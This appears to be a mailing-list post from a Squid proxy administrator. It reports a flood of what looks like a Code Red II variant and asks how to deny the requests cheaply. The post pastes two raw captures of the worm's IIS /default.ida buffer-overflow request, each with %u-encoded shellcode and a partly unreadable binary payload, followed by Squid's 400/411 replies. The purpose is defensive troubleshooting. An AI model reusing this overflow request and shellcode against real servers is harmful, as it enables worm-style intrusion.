Hi, We are seeing a possible new code red. Each victim will flood to a particular destination. Unlike the original one, this one does not have send proper HTTP method. Although Squid will return Bad Request, this attack will consume a lot of resources and bring down the Squid box...
Anybody catches the same thing? It seems to us that DENIED/403 requires less processing than returning NONE/400 or NONE/411. If this it true, is there anyway to deny these requests? GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX X%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u685 8%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53f f%u0078%u0000%u00=a HTTP/1.0..Content-type: text/xml.Conten t-length: 3379 ........`........dg.6..dg.&.......h......\... [EMAIL PROTECTED] 0...........F0.........CodeRedII...$.U.f.....8.....P.......j ...P...P..8...P.E..p.........8....thS.U..U..E.i.T...,.....,. .............F4.E.Pj..u...........j.j..U.P.U.Ou..;...i.T.... \&....\&.W.U.j.j..U.j..U....F4)E.jd.U...<...P.U....<...=.... s....>......s.f..p.....f..r....P.d.....t...j.j.j..U....t..E. j.Th~f...u..U.Yj...p...P.u..U........tK3..U.=3'..u?..h...... ...l.........`........E...d.....h...Pj...`...Pj.j..U..j.Th~f ...u..U.Y...u1.....X-....j.h....P.u..U.=....u.j.j...\...P.u. .U..u..U..........w...........xu......`......d$.dg....Xa..dg .6..dg.&..f.;MZu..K<.<.PE..u..T.x...B..<.KERNu..|..EL32u.3.I .r ...A..<.GetPu..|..rocAu..J.I...J$........J.......D$$dg... .Xa..Q....]..E......LoadLibraryA..u..U..E......CreateThread. .u..U..E......GetTickCount..u..U..E......Sleep..u..U..E..... .GetSystemDefaultLangID..u..U..E......GetSystemDirectoryA..u ..U..E......CopyFileA..u..U..E......GlobalFindAtomA..u..U..E ......GlobalAddAtomA Squid 2.4S6 reply: HTTP/1.0 411 Length Required. XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u780 1%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0 0%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0..Host: xxx.xx.xxx.x x..Content-type: text/xml.Content-length: 3379 ..Cache-Contr ol: max-stale=0........`........dg.6..dg.&.......h......\... [EMAIL PROTECTED] 0...........F0.........CodeRedII...$.U.f.....8.....P.......j ...P...P..8...P.E..p.........8....thS.U..U..E.i.T...,.....,. .............F4.E.Pj..u...........j.j..U.P.U.Ou..;...i.T.... \&....\&.W.U.j.j..U.j..U....F4)E.jd.U...<...P.U....<...=.... s....>......s.f..p.....f..r....P.d.....t...j.j.j..U....t..E. j.Th~f...u..U.Yj...p...P.u..U........tK3..U.=3'..u?..h...... ...l.........`........E...d.....h...Pj...`...Pj.j..U..j.Th~f ...u..U.Y...u1.....X-....j.h....P.u..U.=....u.j.j...\...P.u. .U..u..U..........w...........xu......`......d$.dg....Xa..dg .6..dg.&..f.;MZu..K<.<.PE..u..T.x...B..<.KERNu..|..EL32u.3.I .r ...A..<.GetPu..|..rocAu..J.I...J$........J.......D$$dg... .Xa..Q....]..E......LoadLibraryA..u..U..E......CreateThread. .u..U..E......GetTickCount..u..U..E......Sleep..u..U..E..... .GetSystemDefaultLangID..u..U..E......GetSystemDirectoryA..u ..U..E......CopyFileA..u..U..E......GlobalFindAtomA..u..U..E ......Global Squid 2.4S6 reply: HTTP/1.0 400 Bad Request. Thanks, Wei Keong
